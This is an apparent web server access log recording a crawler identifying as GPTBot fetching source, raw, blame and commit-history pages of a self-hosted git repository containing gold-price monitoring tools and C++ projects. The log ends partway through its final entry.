"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10657] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" +[17/Feb/2026:14:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10168] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:14:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10663] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:14:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12609] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108401] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107171] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13063] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:14:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10680] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" +[17/Feb/2026:14:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10648] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" +[17/Feb/2026:14:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10658] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:14:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10630] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" +[17/Feb/2026:14:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814867] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813163] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107168] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107141] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108791] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108376] [Gzip 18.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2814006] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 